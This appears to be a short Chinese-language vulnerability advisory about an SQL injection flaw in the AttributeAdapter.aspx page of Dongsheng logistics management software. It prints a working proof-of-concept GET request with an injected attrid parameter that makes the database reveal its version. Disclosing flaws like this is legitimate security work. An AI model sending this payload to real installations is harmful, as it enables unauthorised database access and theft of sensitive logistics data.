东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞

日期: 2024-11-06 | 影响软件: 东胜物流管理软件 | POC: 已公开

漏洞描述

东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统AttributeAdapter.aspx 存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库敏感信息。

PoC代码

GET /FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20-- HTTP/1.1
Host: 

相关漏洞推荐